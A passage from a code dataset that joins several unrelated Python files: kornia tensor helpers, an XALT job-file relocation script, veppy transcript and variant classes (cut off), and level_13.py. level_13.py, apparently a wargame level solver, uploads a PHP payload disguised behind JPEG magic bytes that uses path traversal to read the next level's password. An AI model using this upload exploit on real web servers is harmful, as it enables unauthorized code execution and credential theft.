] | 418 | 2018-10-02T22:31:36.000Z | 2019-01-16T14:15:45.000Z | kornia/utils/misc.py | Ishticode/kornia | 974abb43ec72d12dbd244a2fb247bbbab8498de0 | [
"ECL-2.0",
"Apache-2.0"
] | 94 | 2019-01-17T22:10:45.000Z | 2019-05-22T23:47:58.000Z | kornia/utils/misc.py | Ishticode/kornia | 974abb43ec72d12dbd244a2fb247bbbab8498de0 | [
"ECL-2.0",
"Apache-2.0"
] | 25 | 2018-10-02T22:50:04.000Z | 2019-01-13T18:14:11.000Z | import torch
def eye_like(n: int, input: torch.Tensor) -> torch.Tensor:
r"""Return a 2-D tensor with ones on the diagonal and zeros elsewhere with the same batch size as the input.
Args:
n: the number of rows :math:`(N)`.
input: image tensor that will determine the batch size of the output matrix.
The expected shape is :math:`(B, *)`.
Returns:
The identity matrix with the same batch size as the input :math:`(B, N, N)`.
"""
if n <= 0:
raise AssertionError(type(n), n)
if len(input.shape) < 1:
raise AssertionError(input.shape)
identity = torch.eye(n, device=input.device, dtype=input.dtype)
return identity[None].repeat(input.shape[0], 1, 1)
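# Usage sketch (illustrative only; the shapes follow from the code above):
#
#   import torch
#   x = torch.rand(2, 3, 4, 4)   # any tensor whose first dimension is the batch
#   eye = eye_like(4, x)         # -> torch.Size([2, 4, 4]), one identity per batch item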
def vec_like(n, tensor):
r"""Return a 2-D tensor with a vector containing zeros with the same batch size as the input.
Args:
n: the number of rows :math:`(N)`.
tensor: image tensor that will determine the batch size of the output matrix.
The expected shape is :math:`(B, *)`.
Returns:
The vector with the same batch size as the input :math:`(B, N, 1)`.
"""
if n <= 0:
raise AssertionError(type(n), n)
if len(tensor.shape) < 1:
raise AssertionError(tensor.shape)
vec = torch.zeros(n, 1, device=tensor.device, dtype=tensor.dtype)
return vec[None].repeat(tensor.shape[0], 1, 1)
| 31.704545 | 112 | 0.630824 |
4a1f5e3fc7a89703c5296d8f776563475183499a | 3,516 | py | Python | level_13.py | katsukaree/chapter-weasel | fa9a6c890eb6bca1f25dd89a97ef10ea7b62c2b7 | [
"MIT"
] | null | null | null | level_13.py | katsukaree/chapter-weasel | fa9a6c890eb6bca1f25dd89a97ef10ea7b62c2b7 | [
"MIT"
] | null | null | null | level_13.py | katsukaree/chapter-weasel | fa9a6c890eb6bca1f25dd89a97ef10ea7b62c2b7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import requests
import base64
import re
import tempfile
import urllib.parse
from bs4 import BeautifulSoup
from levels_credentials import credentials, folder
level_url = credentials[13]["url"]
level_username = credentials[13]["level"]
level_password = credentials[13]["password"]
next_level_url = credentials[14]["url"]
next_level_username = credentials[14]["level"]
next_level_pass = folder + next_level_username
credentials = "%s:%s" % (level_username, level_password)
auth_creds = base64.b64encode(credentials.encode("ascii"))
heads = {"Authorization": "Basic %s" % auth_creds.decode("ascii")}
basic_file = b"""\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07\x07\t\t\x08\n\x0c\x14\r\x0c\x0b\x0b\x0c\x19\x12\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c $.\' ",#\x1c\x1c(7),01444\x1f\'9=82<.342\xff\xdb\x00C\x01\t\t\t\x0c\x0b\x0c\x18\r\r\x182!\x1c!22222222222222222222222222222222222222222222222222\xff\xc0\x00\x11\x08\x00\x01\x00\x01\x03\x01"\x00\x02\x11\x01\x03\x11\x01\xff\xc4\x00\x1f\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\xff\xc4\x00\xb5\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00\x01}\x01\x02\x03\x00\x04\x11\x05\x12!1A\x06\x13Qa\x07"q\x142\x81\x91\xa1\x08#B\xb1\xc1\x15R\xd1\xf0$3br\x82\t\n\x16\x17\x18\x19\x1a%&\'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xc4\x00\x1f\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\xff\xc4\x00\xb5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01\x02w\x00\x01\x02\x03\x11\x04\x05!1\x06\x12AQ\x07aq\x13"2\x81\x08\x14B\x91\xa1\xb1\xc1\t#3R\xf0\x15br\xd1\n\x16$4\xe1%\xf1\x17\x18\x19\x1a&\'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00?\x00\xf7\xfa(\xa2\x80?\xff\xd9"""
payload = b'<?php $myfile = fopen("../../../../../../../..%s", "r"); echo fgets($myfile); fclose($myfile); ?>' % next_level_pass.encode("ascii")
spiked_file = basic_file + payload
initial_response = requests.get(level_url, headers=heads)
initial_page = BeautifulSoup(initial_response.text, 'html.parser')
hidden_filename = initial_page.find_all("input")[1].get("value")
filename_list = re.split("\.", hidden_filename)
with tempfile.NamedTemporaryFile(prefix=filename_list[0], suffix=".php") as fp:
fp.write(spiked_file)
fp.seek(0)
files = {"uploadedfile": fp}
next_data = {"MAX_FILE_SIZE": "1000", "filename":"%s.php" % filename_list[0]}
next_response = requests.post(level_url, headers=heads, files=files, data=next_data)
next_response_parsed = BeautifulSoup(next_response.text, 'html.parser')
evil_file = next_response_parsed.find_all("a")[0].get("href")
evil_file_path = level_url + evil_file
next_pass = requests.get(evil_file_path, headers=heads)
print(next_pass.text.strip()[-32::])
| 74.808511 | 1,872 | 0.742036 |
4a1f6028964148dcc46c1ff12bbb3ff8d2b421b7 | 1,159 | py | Python | relocate_xaltjson.py | adityakavalur/slurm-docker-cluster | d54703ddcab9d456be4743dae0f51daf3d549df5 | [
"MIT"
] | null | null | null | relocate_xaltjson.py | adityakavalur/slurm-docker-cluster | d54703ddcab9d456be4743dae0f51daf3d549df5 | [
"MIT"
] | null | null | null | relocate_xaltjson.py | adityakavalur/slurm-docker-cluster | d54703ddcab9d456be4743dae0f51daf3d549df5 | [
"MIT"
] | null | null | null | import grp
import pwd
import os
import json
import fnmatch
from glob import glob
org_dir="/data/xalt2_json"
reloc_dir="/data/xalt2_json_moved"
xalt_dir=glob(org_dir+"/*")
user=pwd.getpwuid(os.getuid()).pw_uid
#move dir at the end of the run
for slurmjobs in xalt_dir:
stat_info = os.stat(slurmjobs)
uid = stat_info.st_uid
if (uid == user):
slurmjobs2=slurmjobs+"/*"
xalt2list=glob(slurmjobs2)
for job2 in xalt2list:
movefile = False
with open(job2) as json_file:
data = json.load(json_file)
if 'userT' in data:
if data["userT"]["job_id"] == os.environ.get('SLURM_JOBID') :
movefile = True
if (movefile):
xaltnum=slurmjobs
xaltnum=slurmjobs.replace(org_dir,'')
if not os.path.exists(reloc_dir+xaltnum):
os.makedirs(reloc_dir+xaltnum)
moveddir = job2.replace(org_dir,reloc_dir)
os.replace(job2,moveddir)
#This needs to be done elsewhere
##delete empty folders
#for slurmjobs in xalt_dir:
# print(len(fnmatch.filter(os.listdir(slurmjobs), '*.json')))
| 28.268293 | 76 | 0.623814 |
4a1f60f66c03890564d050fd681dadc2f607e8f5 | 37,267 | py | Python | veppy/features.py | solvebio/veppy | 75d581d562a6d50fd6181b2870feda26ff50115c | [
"MIT"
] | 13 | 2016-10-04T19:41:48.000Z | 2021-01-14T15:38:28.000Z | veppy/features.py | solvebio/veppy | 75d581d562a6d50fd6181b2870feda26ff50115c | [
"MIT"
] | 7 | 2016-10-05T18:58:50.000Z | 2020-07-15T13:01:07.000Z | veppy/features.py | solvebio/veppy | 75d581d562a6d50fd6181b2870feda26ff50115c | [
"MIT"
] | 5 | 2016-10-05T12:51:32.000Z | 2016-11-14T19:26:28.000Z | import sys
import re
import logging
from intervaltree import IntervalTree
from bisect import bisect
from collections import defaultdict, namedtuple
from . import errors
logger = logging.getLogger('veppy')
def intersects(start0, stop0, start1, stop1):
return \
overlaps(start0, stop0, start1, stop1) or \
contains(start1, stop1, start0, stop0)
def overlaps(start0, stop0, start1, stop1):
return start0 <= stop1 and stop0 >= start1
def contains(start0, stop0, start1, stop1):
return start0 >= start1 and stop0 <= stop1
def contains_point(coord, start1, stop1):
return contains(coord, coord, start1, stop1)
class Feature(object):
def __init__(self, chromosome, start, stop, strand, frame,
info={}, genome_build='GRCh37'):
self.chromosome = chromosome
self.start = start
self.stop = stop
self.strand = strand
self.frame = frame
self.info = info
self.genome_build = genome_build
@property
def length(self):
return self.stop - self.start + 1
def overlaps(self, feature):
return overlaps(feature.start, feature.stop, self.start, self.stop)
def contains(self, feature):
return contains(feature.start, feature.stop, self.start, self.stop)
def intersects(self, feature):
return intersects(feature.start, feature.stop, self.start, self.stop)
# override these methods to define custom sorting/comparator
def __eq__(self, feature):
return \
self.__class__ == feature.__class__ and \
self.chromosome == feature.chromosome and \
self.start == feature.start and \
self.stop == feature.stop
def __ne__(self, obj):
return not self.__eq__(obj)
def __gt__(self, obj):
return self.start > obj.start
def __lt__(self, obj):
return self.start < obj.start
def __str__(self):
return \
'feature: %s, chromosome: %s, coordinates: [%s, %s]' % \
(self.__class__.__name__, self.chromosome, self.start, self.stop)
def __repr__(self):
return str(self)
def to_dict(self):
return {
'chromosome': self.chromosome,
'start': self.start,
'stop': self.stop,
'strand': self.strand
}
class VepSpliceAcceptorJunction(Feature):
# defined in accordance with standard VEP definition:
# spans from [-8 bp, 3 bp] ([-3bp, 8bp]) of intron/exon (exon/intron)
# boundary
def __init__(self, transcript, intron):
chromosome = transcript.chromosome
strand = transcript.strand
frame = None
if strand == '+':
start = intron.stop - 7
stop = intron.stop + 3
self.splice_acceptor = \
Feature(
chromosome,
intron.stop - 1,
intron.stop,
strand,
frame
)
else:
start = intron.start - 3
stop = intron.start + 7
self.splice_acceptor = \
Feature(
chromosome,
intron.start,
intron.start + 1,
strand,
frame
)
super(VepSpliceAcceptorJunction, self).__init__(
chromosome, start, stop, strand, frame)
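# Worked example (derived from the arithmetic above, for illustration only):
# for an intron spanning [1001, 1200] on the '+' strand the junction covers
# [intron.stop - 7, intron.stop + 3] = [1193, 1203] with a 2 bp acceptor site
# at [1199, 1200]; on the '-' strand the same intron yields a junction of
# [intron.start - 3, intron.start + 7] = [998, 1008] and an acceptor site at
# [1001, 1002].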
class VepSpliceDonorJunction(Feature):
# defined in accordance with standard VEP definition:
# spans from [-8 bp, 3 bp] ([-3bp, 8bp]) of intron/exon (exon/intron)
# boundary
def __init__(self, transcript, intron):
chromosome = transcript.chromosome
strand = transcript.strand
frame = None
if strand == '+':
start = intron.start - 3
stop = intron.start + 7
self.splice_donor = \
Feature(
chromosome,
intron.start,
intron.start + 1,
strand,
frame
)
else:
start = intron.stop - 7
stop = intron.stop + 3
self.splice_donor = \
Feature(
chromosome,
intron.stop - 1,
intron.stop,
strand,
frame
)
super(VepSpliceDonorJunction, self).__init__(
chromosome, start, stop, strand, frame)
class ParentFeature(Feature):
def __init__(self, *args, **kwargs):
self.feature_trees = defaultdict(IntervalTree)
self._built = False
super(ParentFeature, self).__init__(*args, **kwargs)
def to_dict(self):
d = super(ParentFeature, self).to_dict()
d['id'] = self.id
return d
@property
def id(self):
return self.info.get(self.id_field)
# check ID for equality as well
def __eq__(self, feature):
return super(ParentFeature, self) == feature and \
self.id == feature.id
def has(self, feature_type):
return len(self.feature_trees[feature_type]) > 0
def first(self, feature_type):
tree = self.feature_trees[feature_type]
leaf = (list(tree[tree.begin()]) or [None])[0]
return leaf.data if leaf else None
def last(self, feature_type):
tree = self.feature_trees[feature_type]
leaf = (list(tree[tree.end() - 1]) or [None])[0]
return leaf.data if leaf else None
def add_feature(self, feature_type, feature):
self.feature_trees[feature_type]\
.addi(feature.start, feature.stop + 1, feature)
def get_features(self, feature_type):
# TODO: calling sorted every time we request a feature list
# could be pretty expensive...
return sorted(
[x.data for x in self.feature_trees[feature_type].items()]
)
def find_overlapping(self, feature_type, variant, first=True):
start = variant.effective_variant.start
stop = variant.effective_variant.stop
features = \
[l.data for l in
self.feature_trees[feature_type.lower()][start:stop + 1]]
if first:
return (features or [None])[0]
else:
return features
def find_overlapping2(self, feature_type, variant, first=True):
# TODO: do we **really** just want to return the first?
feature_array = self.feature_trees[feature_type.lower()]
if len(feature_array) == 0:
return None
i = bisect(feature_array, variant)
_features = []
for j in {max(i - 1, 0), min(i, len(feature_array) - 1)}:
feature = feature_array[j]
if overlaps(
variant.effective_variant.start,
variant.effective_variant.stop,
feature.start + (1 if variant.is_insertion else 0),
feature.stop
):
_features.append(feature)
elif len(_features) > 0:
break
if first:
return None if not _features else _features[0]
else:
return _features
# wrapper method to safely build transcripts.
# e.g. does not build correctly for SeqGene v.104 b/c of invalid,
# overlapping exons
def build(self, data, force=False):
if self._built and not force:
return
try:
self._build(data, force=force)
# assign numbers to exons, introns and cdses
for feature_type in ['exon', 'intron']:
features = self.get_features(feature_type)[::1 if self.strand == '+' else -1] # noqa
for (i, feature) in enumerate(features):
# start counting at 1!
feature.number = i + 1
feature.total = len(features)
except Exception, e:
logger.warn('Invalid feature %s' % self)
logger.warn(e)
self.errors = True
def __str__(self):
return \
'feature: %s, %s, chromosome: %s, coordinates: [%s, %s]' % \
(
self.__class__.__name__,
self.id,
self.chromosome,
self.start,
self.stop
)
class DefaultFeatureMixin(object):
default = False
class Gene(DefaultFeatureMixin, ParentFeature):
transcripts = None
@property
def symbol(self):
return self.info.get(self.symbol_field)
class EnsemblGene(Gene):
feature = 'gene'
id_field = 'gene_id'
symbol_field = 'gene_name'
class GencodeGene(EnsemblGene):
pass
class NcbiGene(Gene):
feature = 'GENE'
id_field = 'gene_id'
symbol_field = 'gene_name'
class Transcript(DefaultFeatureMixin, ParentFeature):
errors = False
protein_id = None
CodingOffset = \
namedtuple(
'CodingOffset',
[
'coding_offset',
'coding_length'
]
)
CodingRange = \
namedtuple(
'CodingRange',
[
'coding_start',
'coding_stop',
'intronic_offset_start',
'intronic_offset_stop'
]
)
GenomicRange = \
namedtuple(
'GenomicRange',
[
'start',
'stop'
]
)
@property
def accession_number(self):
# from ENST123456.78, return ENST123456
return self.id.split('.', 1)[0]
@property
def accession_int(self):
# from ENST123456.78, return 123456 as int
# strips all non-digits from string and returns as int
return int(re.sub(r"\D", "", self.id.split('.', 1)[0]))
@property
def accession_version(self):
# from ENST123456.78, return 78
if '.' in self.id:
return int(self.id.rsplit('.', 1)[-1])
return 0
@property
def gene_id(self):
return self.info.get(self.gene_id_field)
@property
def exons(self):
return self.get_features('exon')
@property
def coding_sequences(self):
return self.get_features('cds')
@property
def untranslated_regions(self):
return self.get_features('utr')
@property
def introns(self):
return self.get_features('intron')
@property
def is_coding(self):
return bool(self.coding_sequences)
@property
def coding_start(self):
return self.first('cds').start
@property
def coding_stop(self):
# TODO: fix this to use 'stop_codon' if it exists...
return self.last('cds').stop
@property
def coding_offsets(self):
return getattr(self, '_coding_offsets', None)
# Coordinate Translator
@property
def coordinate_translator(self):
if not hasattr(self, '_coordinate_translator'):
self._coordinate_translator = \
Transcript.CoordinateTranslator(
self.exons,
self.introns,
self.strand,
self.coding_offsets.coding_offset,
self.coding_offsets.coding_length
)
return self._coordinate_translator
class CoordinateTranslator(object):
class Leaf(object):
def __init__(self, feature, coding_start, coding_stop):
self.feature = feature
self.start = feature.start
self.stop = feature.stop
self.coding_start = coding_start
self.coding_stop = coding_stop
def __str__(self):
return 'genomic: [%s, %s], coding: [%s, %s]' % (
self.start, self.stop, self.coding_start, self.coding_stop
)
def __init__(
self, exons, introns, strand, coding_offset, coding_length):
self.strand = strand
self.coding_offset = coding_offset
self.coding_length = coding_length
self._exon_tree = IntervalTree()
self._intron_tree = IntervalTree()
self._genomic_tree = IntervalTree()
_coding_start = -self.coding_offset
for exon in (exons if self.strand == '+' else exons[::-1]):
leaf = Transcript.CoordinateTranslator.Leaf(
exon,
_coding_start,
_coding_start + exon.length - 1
)
self._genomic_tree.addi(leaf.start, leaf.stop + 1, leaf)
self._exon_tree.addi(
leaf.coding_start, leaf.coding_stop + 1, leaf)
# increment
_coding_start = leaf.coding_stop + 1
for intron in introns:
# introns don't have coding coordinates, so use those of
# adjacent exons
leaf_genomic_upstream = \
list(self._genomic_tree[intron.start - 1])[0].data
leaf_genomic_downstream = \
list(self._genomic_tree[intron.stop + 1])[0].data
# NOTE: always assemble intronic offsets w.r.t. to the
# 'coding stop' position of the upstream CDS
if self.strand == '+':
leaf = \
Transcript.CoordinateTranslator.Leaf(
intron,
leaf_genomic_upstream.coding_stop,
leaf_genomic_downstream.coding_start
)
else:
leaf = \
Transcript.CoordinateTranslator.Leaf(
intron,
leaf_genomic_downstream.coding_stop,
leaf_genomic_upstream.coding_start
)
self._intron_tree.addi(leaf.start, leaf.stop + 1, leaf)
# add introns that are upstream and downstream to the exon
# sequence
# TODO: we may not need this, depending on how we choose to handle
# [start, stop] ranges that occur outside exon ranges
if self.strand == '+':
# straw upstream (genomic) intron
straw0 = \
Feature('.', 0, self._genomic_tree.begin() - 1, self.strand, None) # noqa
leaf0 = \
Transcript.CoordinateTranslator.Leaf(straw0, -1, 0)
self._intron_tree.addi(straw0.start, straw0.stop, leaf0)
# straw downstream (genomic) intron
straw1 = \
Feature('.', self._genomic_tree.end() + 1, sys.maxint, self.strand, None) # noqa
leaf1 = \
Transcript.CoordinateTranslator.Leaf(
straw1, self.coding_length - 1, self.coding_length) # noqa
self._intron_tree.addi(straw1.start, straw1.stop, leaf1)
else:
# straw upstream (genomic) intron
straw0 = \
Feature('.', 0, self._genomic_tree.begin() - 1, self.strand, None) # noqa
leaf0 = \
Transcript.CoordinateTranslator.Leaf(straw0, self.coding_length - 1, self.coding_length) # noqa
self._intron_tree.addi(straw0.start, straw0.stop, leaf0)
# straw downstream (genomic) intron
straw1 = \
Feature('.', self._genomic_tree.end() + 1, sys.maxint, self.strand, None) # noqa
leaf1 = \
Transcript.CoordinateTranslator.Leaf(straw1, -1, 0) # noqa
self._intron_tree.addi(straw1.start, straw1.stop, leaf1)
def to_coding_range(self, start, stop, hgvs_format=False):
# from above, introns have a coding_length == 1
# TODO: set 'intron' attribute on leaves in '_intron_tree'
# above
def _is_intron(leaf):
return leaf.coding_stop - leaf.coding_start == 1
# coding start
range_coding_start = (
list(self._genomic_tree[start] | self._intron_tree[start]) or
[None]
)[0]
coding_start = None
intron_coding_offset_start = 0
leaf = range_coding_start.data
if _is_intron(leaf):
if self.strand == '+':
delta0 = start - leaf.start + 1
delta1 = leaf.stop + 1 - start
if hgvs_format and delta0 > delta1:
coding_start = leaf.coding_stop
intron_coding_offset_start = -delta1
else:
coding_start = leaf.coding_start
intron_coding_offset_start = delta0
else:
delta0 = leaf.stop + 1 - stop
delta1 = stop - leaf.start + 1
if hgvs_format and delta0 > delta1:
coding_start = leaf.coding_stop
intron_coding_offset_start = -delta1
else:
coding_start = leaf.coding_start
intron_coding_offset_start = delta0
else:
if self.strand == '+':
coding_start = \
leaf.coding_start + (start - leaf.start)
else:
coding_start = \
leaf.coding_start + (leaf.stop - stop)
# coding stop
range_coding_stop = (
list(self._genomic_tree[stop] | self._intron_tree[stop]) or
[None]
)[0]
coding_stop = None
intron_coding_offset_stop = 0
leaf = range_coding_stop.data
if _is_intron(leaf):
if self.strand == '+':
delta0 = stop - leaf.start + 1
delta1 = leaf.stop + 1 - stop
if hgvs_format and delta0 > delta1:
coding_stop = leaf.coding_stop
intron_coding_offset_stop = -delta1
else:
coding_stop = leaf.coding_start
intron_coding_offset_stop = delta0
else:
delta0 = leaf.stop + 1 - start
delta1 = start - leaf.start + 1
if hgvs_format and delta0 > delta1:
coding_stop = leaf.coding_stop
intron_coding_offset_stop = -delta1
else:
coding_stop = leaf.coding_start
intron_coding_offset_stop = delta0
else:
if self.strand == '+':
coding_stop = \
leaf.coding_stop - (leaf.stop - stop)
else:
coding_stop = \
leaf.coding_stop - (start - leaf.start)
return \
Transcript.CodingRange(
coding_start,
coding_stop,
intron_coding_offset_start,
intron_coding_offset_stop
)
def to_genomic_ranges(self, coding_start, coding_stop):
genomic_ranges = []
list_ranges = sorted(
self._exon_tree[coding_start:coding_stop + 1],
reverse=self.strand == '-'
)
for leaf in [r.data for r in list_ranges]:
if self.strand == '+':
genomic_ranges.append(
Transcript.GenomicRange(
leaf.start + max(coding_start - leaf.coding_start, 0), # noqa
leaf.stop - max(leaf.coding_stop - coding_stop, 0) # noqa
)
)
else:
genomic_ranges.append(
Transcript.GenomicRange(
leaf.start + max(leaf.coding_stop - coding_stop, 0), # noqa
leaf.stop - max(coding_start - leaf.coding_start, 0) # noqa
)
)
return genomic_ranges
def __str__(self):
return 'coding sequences: %s' % map(str, self._tree)
class EnsemblTranscript(Transcript):
feature = 'transcript'
id_field = 'transcript_id'
gene_id_field = 'gene_id'
def _build(self, data, force=False):
# create feature arrays...
for d in data:
feature_types = [d.get('feature').lower()]
for feature_type in feature_types:
self.add_feature(
feature_type,
Feature(
d['chromosome'],
d['start'],
d['stop'],
d['strand'],
d['frame'],
d['info']
)
)
# super hack! append 'stop_codon', if it exists, to
# the last CDS (if '+' strand) or first CDS (if '-' strand)
# including the stop codon in the last CDS makes lots of math
# and calculations easier for both VEP and HGVS
stop_codon = (self.get_features('stop_codon') or [None])[-1]
if self.strand == '+':
stop_cds = self.last('cds')
else:
stop_cds = self.first('cds')
if stop_codon and stop_cds:
# BUG FIX: ENST00000470843
# transcript where entirety of last exon is a stop codon.
# if so, append a new CDS, else update stop position
# of last codon
# uggh....
if self.strand == '+':
self.add_feature(
'cds',
Feature(
stop_codon.chromosome,
stop_codon.start,
stop_codon.stop,
stop_codon.strand,
stop_codon.frame,
stop_codon.info
)
)
else:
self.add_feature(
'cds',
Feature(
stop_codon.chromosome,
stop_codon.start,
stop_codon.stop,
stop_codon.strand,
stop_codon.frame,
stop_codon.info
)
)
# fix frame start...
if self.strand == '+':
start_cds = (self.coding_sequences or [None])[0]
if start_cds and start_cds.frame is not None:
start_cds.start += start_cds.frame
else:
start_cds = (self.coding_sequences or [None])[-1]
if start_cds and start_cds.frame is not None:
start_cds.stop -= start_cds.frame
# calculate coding coordinate system
if self.is_coding:
if self.strand == '+':
_cds = self.first('cds')
_coding_offset = 0
for _exon in self.exons:
if _exon.contains(_cds):
self._coding_offsets = \
Transcript.CodingOffset(
_coding_offset + (_cds.start - _exon.start),
sum([x.length for x in self.coding_sequences])
)
break
else:
_coding_offset += _exon.length
else:
_cds = self.last('cds')
_coding_offset = 0
for _exon in self.exons[::-1]:
if _exon.contains(_cds):
self._coding_offsets = \
Transcript.CodingOffset(
_coding_offset + (_exon.stop - _cds.stop),
sum([x.length for x in self.coding_sequences])
)
break
else:
_coding_offset += _exon.length
# create introns...
# not sure this sort is required anymore...
sorted_exons = sorted(self.get_features('exon'))
for i in range(1, len(sorted_exons)):
x_prev = sorted_exons[i - 1]
x = sorted_exons[i]
intron = Feature(
x.chromosome,
x_prev.stop + 1,
x.start - 1,
x.strand,
x.frame,
x.info
)
self.add_feature('intron', intron)
# build acceptor/donor splice junctions
if self.strand == '+':
self.add_feature(
'splice_acceptor_junction',
VepSpliceAcceptorJunction(self, intron)
)
self.add_feature(
'splice_donor_junction',
VepSpliceDonorJunction(self, intron)
)
else:
# negative strand
self.add_feature(
'splice_acceptor_junction',
VepSpliceAcceptorJunction(self, intron)
)
self.add_feature(
'splice_donor_junction',
VepSpliceDonorJunction(self, intron)
)
self._built = True
class GencodeTranscript(EnsemblTranscript):
pass
class NcbiTranscript(Transcript):
feature = 'RNA'
id_field = 'transcript_id'
gene_id_field = 'gene_id'
def _build(self, data, force=False):
# create feature arrays...
for d in data:
self.add_feature(
d.get('feature').lower(),
Feature(
d['chromosome'],
d['start'],
d['stop'],
d['strand'],
None,
d.get('info', {})
)
)
# add in frames...
# we have to calculate these by hand from the MapView file
prev_cds = None
for (i, cds) in enumerate(self.get_features('cds')):
if i == 0:
cds.frame = 0
else:
cds.frame = (prev_cds.frame + prev_cds.length) % 3
prev_cds = cds
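# Worked example (illustrative): for CDS lengths 100, 200 and 150 the loop
# above assigns frames 0, (0 + 100) % 3 = 1 and (1 + 200) % 3 = 0; each frame
# is the previous frame plus the previous length, modulo 3.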
# build exons
exonic_features = \
sorted(self.coding_sequences + self.get_features('utr'))
exon = None
for feature in exonic_features:
if exon and exon.stop == feature.start - 1:
exon.stop = feature.stop
continue
exon = \
Feature(
feature.chromosome,
feature.start,
feature.stop,
feature.strand,
feature.frame,
feature.info
)
self.add_feature('exon', exon)
# calculate coding coordinate system
if self.is_coding:
if self.strand == '+':
_cds = (self.coding_sequences or [None])[0]
_coding_offset = 0
for _exon in self.exons:
if _exon.contains(_cds):
self._coding_offsets = \
Transcript.CodingOffset(
_coding_offset + (_cds.start - _exon.start),
sum([x.length for x in self.coding_sequences])
)
break
else:
_coding_offset += _exon.length
else:
_cds = (self.coding_sequences or [None])[-1]
_coding_offset = 0
for _exon in reversed(self.exons):
if _exon.contains(_cds):
self._coding_offsets = \
Transcript.CodingOffset(
_coding_offset + (_exon.stop - _cds.stop),
sum([x.length for x in self.coding_sequences])
)
break
else:
_coding_offset += _exon.length
# create introns...
# not sure this sort is required anymore...
sorted_exons = sorted(self.get_features('exon'))
for i in range(1, len(sorted_exons)):
x_prev = sorted_exons[i - 1]
x = sorted_exons[i]
intron = Feature(
x.chromosome,
x_prev.stop + 1,
x.start - 1,
x.strand,
x.frame,
x.info
)
self.add_feature('intron', intron)
# build acceptor/donor splice junctions
if self.strand == '+':
self.add_feature(
'splice_acceptor_junction',
VepSpliceAcceptorJunction(self, intron)
)
self.add_feature(
'splice_donor_junction',
VepSpliceDonorJunction(self, intron)
)
else:
# negative strand
self.add_feature(
'splice_acceptor_junction',
VepSpliceAcceptorJunction(self, intron)
)
self.add_feature(
'splice_donor_junction',
VepSpliceDonorJunction(self, intron)
)
self._built = True
class Variant(Feature):
type = 'variant'
def __init__(self, chromosome, start, ref, alt,
genome_build='GRCh37'):
self.reference_allele = ref
self.alternate_allele = alt
super(Variant, self).__init__(
chromosome,
start,
start + max(len(ref) - 1, 0),
'.',
None,
genome_build=genome_build
)
self._offset_variant = None
self._effective_variant = None
def clone(self):
return Variant(
self.chromosome,
self.start,
self.reference_allele,
self.alternate_allele,
genome_build=self.genome_build
)
# override these methods to define custom sorting/comparator
def hash(self):
return str(self)
@property
def sequence_length(self):
if self.is_insertion:
return len(self.alternate_allele)
else:
return \
abs(len(self.reference_allele) - len(self.alternate_allele))
# Variant types
@property
def is_substitution(self):
return \
len(self.reference_allele) == len(self.alternate_allele)
@property
def is_indel(self):
return \
len(self.reference_allele) > 1 and len(self.alternate_allele) > 1
@property
def is_insertion(self):
return \
len(self.alternate_allele) > 1 and \
len(self.reference_allele) == 1
@property
def is_deletion(self):
return \
len(self.reference_allele) > 1 and \
len(self.alternate_allele) == 1
@property
def is_snp(self):
return \
len(self.reference_allele) == 1 and \
len(self.reference_allele) == len(self.alternate_allele)
@property
def reference_length(self):
return len(self.reference_allele)
@property
def alternate_length(self):
return len(self.alternate_allele)
# Variant sequence coordinates
def offset_variant(self):
if not self._offset_variant:
variant = self.clone()
if variant.reference_allele[0] == variant.alternate_allele[0]:
variant.reference_allele = variant.reference_allele[1:]
variant.alternate_allele = variant.alternate_allele[1:]
variant.start += 1
self._offset_variant = variant
return self._offset_variant
def offset_reference(self):
if self.reference_allele[0] == self.alternate_allele[0]:
return self.reference_allele[1:]
def offset_alternate(self):
if self.reference_allele[0] == self.alternate_allele[0]:
return self.alternate_allele[1:]
@property
def effective_variant(self):
if not self._effective_variant:
self._effective_variant = EffectiveVariant(self)
return self._effective_variant
@property
def sbid(self):
return '{}-{}-{}-{}-{}'.format(
self.genome_build,
self.chromosome,
self.start,
self.stop,
self.alternate_allele
)
def __eq__(self, feature):
return \
self.__class__ == feature.__class__ and \
self.chromosome == feature.chromosome and \
self.start == feature.start and \
self.stop == feature.stop and \
self.reference_allele == feature.reference_allele and \
self.alternate_allele == feature.alternate_allele
def __str__(self):
return (
'feature: %s, chromosome: %s, coordinates: [%s, %s, %s --> %s]' % # noqa
(
self.__class__.__name__,
self.chromosome,
self.start,
self.stop,
self.reference_allele,
self.alternate_allele
)
)
class EffectiveVariant(Variant):
def __init__(self, variant):
# avoid InceptionVariant. ensure that we don't make an
# EffectiveVariant for an EffectiveVariant
if isinstance(variant, EffectiveVariant):
chromosome = variant.chromosome
start = variant.start
reference_allele = variant.reference_allele
